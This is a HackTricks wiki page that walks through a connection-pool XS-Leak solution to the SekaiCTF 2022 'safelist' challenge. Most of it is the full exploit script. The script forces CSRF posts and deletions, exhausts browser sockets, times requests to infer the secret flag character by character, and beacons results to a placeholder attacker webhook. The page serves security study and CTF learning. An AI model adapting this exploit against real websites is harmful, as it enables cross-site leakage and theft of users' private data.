hacktricks/pentesting-web/xs-search/connection-pool-example.md

Connection Pool Example

🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥

• Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
• Discover The PEASS Family, our collection of exclusive NFTs
• Get the official PEASS & HackTricks swag
• Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
• Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.

In the Sekaictf2022 - safelist challenge, @Strellic_ **** gives an example of how to use a variation of the Connection Pool technique to perform a XS-Leak.

In this challenge, the goal is to exfiltrate a flag that will appear in the bots web session inside a post. These are the assets the attacker has:

• The bot will visit a URL given by the attacker
• The attacker can inject HTML in the page (but no JS, dompurify is used) abusing a CSRF making the bot create a post with that HTML.
• The attacker can abuse a CSRF to make the bot delete the first post inside the web.
• Because the posts are ordered alphabetically, when the first post is deleted, if the HTML content of the attacker is loaded means that it was alphabetically before the flag.

Therefore, to steal the flag, the solution proposed by @Strellyc_ is to, for each char to test make the bot:

• Create a new post that starts with the known part of the flag and several img loads.
• Delete the post in position 0.
• Block 255 sockets.
• Load the page with the posts
• Perform 5 random requests to a site (example.com in this case) and measure the time this takes.

{% hint style="warning" %} If the deleted post was the flag, this means that all the images injected in the HTML are going to be fighting with the 5 random requests for that unblocked socket. Which means that the time measured is going to be bigger than the other scenario.

If the deleted post was the HTML, the 5 random requests will be faster because they don't need to fight for that socket with the HTML injected. {% endhint %}

This is the exploit code, taken from https://github.com/project-sekai-ctf/sekaictf-2022/blob/main/web/safelist/solution/solve.html:

<!-- Form to inject HTML code in the bots page -->
<form method="POST" action="https://safelist.ctf.sekai.team/create" id="create" target="_blank">
    <input type="text" name="text" />
    <input type="submit" />
</form>

<!-- Form to delete the first entry -->
<form method="POST" action="https://safelist.ctf.sekai.team/remove" id="remove" target="_blank">
    <input type="text" name="index" value="0" />
    <input type="submit" />
</form>

<script>
    // Attacker listening
    const WEBHOOK = "https://WEBHOOK.com/";
    // Send data to attacker
    const log = (id, data) => {
        let payload = JSON.stringify({ known, alphabet, data });
        console.log(id, payload);
        navigator.sendBeacon(WEBHOOK + "?" + id, payload); 
    }
    
    // Similar to JQuery
    const $ = document.querySelector.bind(document);
    
    // Known part of the flag
    const known = "SEKAI{";
    let alphabet = "_abcdefghijklmnopqrstuvwxyz}";
    
    // Reduce the alphabet using a hash (#) in the URL
    if (location.hash) {
        alphabet = alphabet.slice(alphabet.indexOf(location.hash.slice(1)));
    }
    
    // Funtion to leak chars
    const leak = async (c) => {
        // Prepare post with known flag and the new char
        let payload = `${known + c}`;
        // Inject as many <img as possible
        // you need to respect the CSP and create URLs that are different
        for(let i = 0; payload.length < 2048; i++) {
            payload += `<img src=js/purify.js?${i.toString(36)}>`;
        }
        
        // Inject HTML
        $("#create input[type=text]").value = payload;
        $("#create").submit();
        await new Promise(r => setTimeout(r, 1000));
        
        // Remove post with index 0
        $("#remove").submit();
        await new Promise(r => setTimeout(r, 500));
        
        let deltas = [];
        
        // Try each char 3 times
        for (let i = 0; i < 3; i++) {
            const SOCKET_LIMIT = 255;
            // you will need a custom server that works like num.sleepserver.com/sleep/delay
            // needed to freeze the blocked sockets, and they have to all be on different origins
            // Check https://www.npmjs.com/package/sleep-server using subdomains DNS wildcard
            const SLEEP_SERVER = i => `http://${i}.sleepserver.com/sleep/60`; 

            const block = async (i, controller) => {
                try {
                    return fetch(SLEEP_SERVER(i), { mode: "no-cors", signal: controller.signal });
                }
                catch(err) {}
            };

            // block SOCKET_LIMIT sockets
            const controller = new AbortController();
            for (let i = 0; i < SOCKET_LIMIT; i++) {
                block(i, controller);
            }
            
            // Make the bot access the page with the posts
            window.open("https://safelist.ctf.sekai.team/?" + Math.random().toString(36).slice(2), "pwn");
            await new Promise(r => setTimeout(r, 500));
            
            // start meassuring time to perform 5 requests
            let start = performance.now();
            await Promise.all([
                fetch("https://example.com", { mode: "no-cors" }),
                fetch("https://example.com", { mode: "no-cors" }),
                fetch("https://example.com", { mode: "no-cors" }),
                fetch("https://example.com", { mode: "no-cors" }),
                fetch("https://example.com", { mode: "no-cors" })
            ]);
            let delta = performance.now() - start;
            document.title = delta;
            controller.abort();

            log("test_" + c + "_" + i, delta);
            
            // Save time needed
            deltas.push(delta);
        }
        return deltas;
    };
    
    // Check each char
    const pwn = async () => {
        // Try to leak each character
        for(let i = 0; i < alphabet.length; i++) {
            //Check the indicated char
            let deltas = await leak(alphabet[i]);
            
            // Calculate mean time from requests to example.com
            let avg = deltas.reduce((a,v) => a+v, 0) / deltas.length;
            
            // If greater than 250, the HTML code was injected (flag in index 0)
            if (avg > 250) {
                log("tests_pos_" + alphabet[i], deltas)
            }
            // Flag in the page
            else {
                log("tests_neg_" + alphabet[i], deltas)
            }
        }
    };

    window.onload = async () => {
        pwn();
    };
</script>

🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥

• Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
• Discover The PEASS Family, our collection of exclusive NFTs
• Get the official PEASS & HackTricks swag
• Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
• Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.